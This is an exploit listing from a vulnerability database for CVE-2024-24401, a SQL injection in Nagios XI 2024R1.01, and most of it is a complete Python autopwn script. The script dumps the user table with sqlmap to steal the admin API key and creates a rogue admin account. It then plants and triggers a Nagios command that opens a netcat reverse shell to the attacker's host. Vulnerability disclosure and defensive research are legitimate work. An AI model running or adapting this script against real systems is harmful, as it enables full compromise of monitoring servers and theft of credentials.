Lucene search
K

Nagios XI 2024R1.01 SQL Injection

πŸ—“οΈΒ 26 Mar 2024Β 00:00:00Reported byΒ Jarod JaslowTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 362Β Views

Nagios XI 2024R1.01 SQL Injection via authentication and mandatory password chang

Related
Code
`# Exploit Title: NAGIOS XI SQLI  
# Google Dork: [if applicable]  
# Date: 02/26/2024  
# Exploit Author: Jarod Jaslow (MAWK) https://www.linkedin.com/in/jarod-jaslow-codename-mawk-265144201/  
# Vendor Homepage: https://www.nagios.com/changelog/#nagios-xi  
# Software Link: https://github.com/MAWK0235/CVE-2024-24401  
# Version: Nagios XI Version 2024R1.01  
# Tested on: Nagios XI Version 2024R1.01 LINUX  
# CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24401  
#  
  
import requests  
import subprocess  
import argparse  
import re  
import urllib3  
import os  
import random  
import string  
from colorama import Fore, Style  
  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
  
  
def serviceLogin(user,password):  
r = requests.post(f'http://{IP}/nagiosxi/api/v1/authenticate?pretty=1',data={'username':user,'password':password,"valid_min":"5"},verify=False)   
print(f"{Fore.MAGENTA}[+] Authenticating with captured credtials to API....")  
match = re.search(r'auth_token": "(.*)"',r.text)  
if match:  
token = match.group(1)  
print(f'{Fore.MAGENTA}[+] Token: ' + token)  
r = requests.get(f'http://{IP}/nagiosxi/login.php?token={token}', verify=False)  
cookie = r.headers['Set-Cookie']  
cookie = cookie.split(',')[0]  
match = re.search(r'nagiosxi=(.*);', cookie)  
cookie = match.group(1)  
print(f"{Fore.MAGENTA}[+] Auth cookie is: " + cookie)  
return cookie  
else:  
print(f'{Fore.RED}[-] Authentication Failed..{Style.RESET_ALL}')  
exit()  
  
def sqlmap(IP,username,password):  
  
print(f'{Fore.MAGENTA}[+] Starting SQLMAP...')  
session = requests.session()  
s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False)  
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)  
nsp = match.group(1)  
print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp)  
data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": username, "password": password, "loginButton": ''}  
s = session.post(f'http://{IP}/nagiosxi/login.php', data=data)  
print(f"{Fore.MAGENTA}[+] Authenticated as User..")  
print(f"{Fore.MAGENTA}[+] Accepting license Agreement...")  
s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False)  
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)  
nsp = match.group(1)  
data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"}  
session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data)  
print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH")  
newPass = "mawk"  
data = {"page": "/nagiosxi/login.php", "pageopt": "changepass", "nsp": nsp,"current_password": password, "password1": newPass, "password2": newPass, "reporttimesubmitbutton": ''}  
session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data)  
s= session.get(f'http://{IP}/nagiosxi/')  
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)  
nsp = match.group(1)  
cookie = s.cookies.get('nagiosxi')  
sqlmap_command = f'sqlmap --flush-session -u "http://{IP}/nagiosxi//config/monitoringwizard.php/1*?update=1&nextstep=2&nsp={nsp}&wizard=mysqlserver" --cookie="nagiosxi={cookie}" --dump -D nagiosxi -T xi_users --drop-set-cookie --technique=ET --dbms=MySQL -p id --risk=3 --level=5 --threads=10 --batch'  
#print(sqlmap_command)  
sqlmap_command_output = subprocess.Popen(sqlmap_command,shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True )  
try:  
for line in iter(sqlmap_command_output.stdout.readline, ''):  
if "| Nagios Administrator |" in line:  
match = re.search(r"Nagios Administrator \| (.*?) \|", line)  
if match:  
adminKey= match.group(1)  
print(f"{Fore.MAGENTA}[+] Admin Key recovered: " + adminKey)  
return adminKey  
else:  
print(f"{Fore.RED}[-] Could not pull Admin Key :(....{Style.RESET_ALL}")  
exit()  
break  
print("[-] SQLMAP capture FAILED..")  
sqlmap_command_output.terminate()  
  
except KeyboardInterrupt:  
print(f"{Fore.RED}[-] SQLMAP interrupted. Cleaning up...{Style.RESET_ALL}")  
sqlmap_command_output.terminate()  
sqlmap_command_output.communicate()  
exit()  
  
def createAdmin(IP,adminKey):  
characters = string.ascii_letters + string.digits  
random_username = ''.join(random.choice(characters) for i in range(5))  
random_password = ''.join(random.choice(characters) for i in range(5))  
  
data = {"username": random_username, "password": random_password, "name": random_username, "email": f"{random_username}@mail.com", "auth_level": "admin"}  
r = requests.post(f'http://{IP}/nagiosxi/api/v1/system/user?apikey={adminKey}&pretty=1', data=data, verify=False)  
if "success" in r.text:  
print(f'{Fore.MAGENTA}[+] Admin account created...')  
return random_username, random_password  
else:  
print(f'{Fore.RED}[-] Account Creation Failed!!! :(...{Style.RESET_ALL}')  
print(r.text)  
exit()  
  
def start_HTTP_server():  
subprocess.Popen(["python", "-m", "http.server", "8000"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)  
  
def adminExploit(adminUsername, adminPassword, IP, LHOST,LPORT):  
print(f"{Fore.MAGENTA}[+] Conducting mandatory password change...")  
session = requests.session()  
s = session.get(f'http://{IP}/nagiosxi/index.php', verify=False)  
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)  
nsp = match.group(1)  
print(f"{Fore.MAGENTA}[+] NSP captured: " + nsp)  
data = {"nsp": nsp, "page": "auth", "debug": '', "pageopt": "login", "username": adminUsername, "password": adminPassword, "loginButton": ''}  
s = session.post(f'http://{IP}/nagiosxi/login.php', data=data)  
print(f"{Fore.MAGENTA}[+] Authenticated as admin..")  
print(f"{Fore.MAGENTA}[+] Accepting license Agreement...")  
s = session.get(f'http://{IP}/nagiosxi/login.php?showlicense', verify=False)  
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)  
nsp = match.group(1)  
data = {"page": "/nagiosxi/login.php", "pageopt": "agreelicense", "nsp": nsp, "agree_license": "on"}  
session.post(f"http://{IP}/nagiosxi/login.php?showlicense", data=data)  
print(f"{Fore.MAGENTA}[+] Performing mandatory password change ARGH")  
newAdminPass = adminUsername + adminPassword  
data = {"page": "/nagiosxi/login.php", "pageopt": "changepass","current_password": adminPassword, "nsp": nsp, "password1": newAdminPass, "password2": newAdminPass, "reporttimesubmitbutton": ''}  
session.post(f"http://{IP}/nagiosxi/login.php?forcepasswordchange", data=data)  
print(f"{Fore.MAGENTA}[+] Creating new command...")  
data = {"tfName": adminUsername, "tfCommand": f"nc -e /usr/bin/sh {LHOST} {LPORT}", "selCommandType": "1", "chbActive": "1", "cmd": "submit", "mode": "insert", "hidId": "0", "hidName": '', "hidServiceDescription": '', "hostAddress": "127.0.0.1", "exactType": "command", "type": "command", "genericType": "command"}  
session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?type=command&page=1', data=data)  
data = {"cmd": '', "continue": ''}  
start_HTTP_server()  
print(f"{Fore.MAGENTA}[+] Created command: " + adminUsername)  
session.post(f'http://{IP}/nagiosxi/includes/components/nagioscorecfg/applyconfig.php?cmd=confirm', data=data)  
data = {"search": adminUsername}  
s = session.post(f'http://{IP}/nagiosxi/includes/components/ccm/index.php?cmd=view&type=command&page=1', data=data)  
match = re.search(r"javascript:actionPic\('deactivate','(.*?)','", s.text)  
if match:  
commandCID = match.group(1)  
print(f"{Fore.MAGENTA}[+] Captured Command CID: " + commandCID)  
s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/?cmd=view&type=service")  
match = re.search(r'var nsp_str = \"(.*?)\"', s.text)  
if match:  
nsp = match.group(1)  
s = session.get(f"http://{IP}/nagiosxi/includes/components/ccm/command_test.php?cmd=test&mode=test&cid={commandCID}&nsp={nsp}")  
os.system("kill -9 $(lsof -t -i:8000)")  
print(f"{Fore.RED}[+] CHECK UR LISTENER")  
else:  
print(f"{Fore.RED}[-] ERROR")  
else:  
print(f"{Fore.RED}[-] Failed to capture Command CID..{Style.RESET_ALL}")  
  
  
  
  
if __name__ == '__main__':  
ascii_art = f"""{Fore.LIGHTRED_EX}  
β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  
β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•  
β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  
β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•— β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ•‘ β•šβ•β•β•β•β–ˆβ–ˆβ•‘  
β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘  
β•šβ•β• β•šβ•β•β•šβ•β• β•šβ•β• β•šβ•β•β•β•šβ•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β•β•šβ•β• β•šβ•β•β•šβ•β•β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β•β•  
{Style.RESET_ALL}   
"""  
print(ascii_art)  
parser = argparse.ArgumentParser(description="AutoPwn Script for Bizness HTB machine", usage= "sudo Nagios.py <Target IP> <LHOST> <LPORT>")  
parser.add_argument('IP' ,help= "Target IP ")  
parser.add_argument('LHOST',help= "Local host")  
parser.add_argument('LPORT' ,help= "Listening Port")  
  
args = parser.parse_args()  
min_required_args = 3  
if len(vars(args)) != min_required_args:  
parser.print_usage()  
exit()  
  
adminUsername, adminPassword = createAdmin(args.IP, sqlmap(args.IP,input(f"{Fore.MAGENTA}[+] Please insert a non-administrative username: "),input(f"{Fore.MAGENTA}[+] Please insert the password: ")))  
print(f"{Fore.MAGENTA}[+] Admin Username=" + adminUsername)  
print(f"{Fore.MAGENTA}[+] Admin Password=" + adminPassword)  
adminExploit(adminUsername, adminPassword, args.IP,args.LHOST,args.LPORT)  
  
  
`

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Mar 2024 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.45884
362